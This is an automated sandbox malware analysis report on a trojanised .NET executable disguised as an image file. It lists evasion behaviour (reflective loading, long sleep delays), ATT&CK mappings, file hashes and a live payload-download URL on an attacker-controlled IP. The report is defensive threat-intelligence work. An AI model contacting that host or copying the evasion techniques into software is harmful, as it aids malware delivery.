Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: IMG_3322101870451.exe, --.cs	.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
Source: IMG_3322101870451.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Memory allocated: 17C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Memory allocated: 3200000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Window / User API: threadDelayed 1632			Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Window / User API: threadDelayed 8213			Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8144	Thread sleep count: 1632 > 30	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8144	Thread sleep count: 8213 > 30	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -37815825351104557s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99430s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -99088s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98964s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98623s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98394s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98252s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -98031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -97046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -96060s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95586s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95480s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95253s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -95031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -94921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -94812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -94703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe TID: 8172	Thread sleep time: -94594s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99430	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 99088	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98964	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98859	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98733	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98623	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98394	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98252	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 98031	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97922	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97812	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97702	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97593	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97484	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97375	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97264	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97156	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 97046	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96937	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96718	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96609	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96500	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96390	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96171	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 96060	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95937	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95812	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95702	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95586	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95480	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95375	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95253	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95140	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 95031	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 94921	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 94812	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 94703	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Thread delayed: delay time: 94594	Jump to behavior

Source: IMG_3322101870451.exe, 00000000.00000002.3813828700.000000000151E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Queries volume information: C:\Users\user\Desktop\IMG_3322101870451.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
IMG_3322101870451.exe	55%	ReversingLabs	Win32.Trojan.Jalapeno
IMG_3322101870451.exe	100%	Avira	TR/Kryptik.dkuuk
IMG_3322101870451.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://185.167.61.13	6%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.167.61.13/aa/Ubeyvibl.vdf	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.167.61.13	IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000032C6000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse	unknown
http://185.167.61.13/aa/Ubeyvibl.vdfP	IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000344C000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000333E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000337E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003396000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003450000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	IMG_3322101870451.exe	false	URL Reputation: safe URL Reputation: safe	unknown
http://185.167.61.13D	IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000338A000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003366000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000333E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000337E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003396000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000335F000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003448000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003450000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000333E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	IMG_3322101870451.exe	false	URL Reputation: safe URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.167.61.13	unknown	Turkey		197328	INETLTDTR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1526378
Start date and time:	2024-10-05 14:36:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IMG_3322101870451.exe
Detection:	MAL
Classification:	mal88.evad.winEXE@1/0@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 94% Number of executed functions: 39 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target IMG_3322101870451.exe, PID 8080 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:37:16	API Interceptor	11732187x Sleep call for process: IMG_3322101870451.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.167.61.13	IMG_10875_200_005.exe	Get hash	malicious	Unknown	Browse	185.167.61.13/aa/Mmkuqbm.pdf
	IMG_10875_200_005.exe	Get hash	malicious	Unknown	Browse	185.167.61.13/aa/Mmkuqbm.pdf
	Receipt207413.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.167.61.13/aa/Zhkopfc.vdf
	IMG_77020316.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.167.61.13/aa/Xvgvfwthp.mp3
	IMG_105_0111_067pdf.exe	Get hash	malicious	Unknown	Browse	185.167.61.13/aa/Fgxwqzsuytf.wav
	IMG_105_0111_067pdf.exe	Get hash	malicious	Unknown	Browse	185.167.61.13/aa/Fgxwqzsuytf.wav

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INETLTDTR	PO.xls	Get hash	malicious	Remcos	Browse	45.134.140.68
	LJ1IZDkHyE.hta	Get hash	malicious	Cobalt Strike, Remcos, PureLog Stealer	Browse	45.134.140.70
	BL.xls	Get hash	malicious	Remcos, PureLog Stealer	Browse	45.134.140.70
	file.exe	Get hash	malicious	Unknown	Browse	5.104.75.170
	file.exe	Get hash	malicious	Unknown	Browse	5.104.75.170
	file_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zip	Get hash	malicious	Unknown	Browse	84.252.92.10
	Google%20Chrome1.exe	Get hash	malicious	Unknown	Browse	89.22.236.120
	Chrome.exe	Get hash	malicious	Unknown	Browse	89.22.236.120
	LEK1JCI81P.exe	Get hash	malicious	RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm	Browse	91.92.120.13
	sVfXReO3QI.exe	Get hash	malicious	Unknown	Browse	45.128.38.162

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.444324190661784
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IMG_3322101870451.exe
File size:	254'328 bytes
MD5:	8290ab3945cfc9355b5f18d4c4262cee
SHA1:	f459dd7cdbc4881d6357c517c2b8026d3da77965
SHA256:	23382ffd9ce9a9b163ed1b6f0ef80242f16c5bc85b0d302fd81b7c4f5cd48acd
SHA512:	6504755ec3dc036dea4e901a6812961b96f4e7ab190a7102bb0f48a1f875d6894be946e301f6369697c975ef27bc6dc62d49eee7602c04bae0376a13072bd48b
SSDEEP:	3072:zuEbDNm5N/CNnCDDRvLGRrOAOkGt6+duWA/t/SHUebbxCbGgKk12qk/mPYm21KL6:6i05ostvLG0CLbMU8K0PH
TLSH:	2E44D7823145DC9AE04329F258EFD56061787D9E8165C60E3783BB2BA5E734334AB78F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H <f................................. ........@.. ....................................`................................

File Icon


Icon Hash:	929296929e9e8e73

Static PE Info

General

Entrypoint:	0x40d6ea
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x663C2048 [Thu May 9 01:00:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
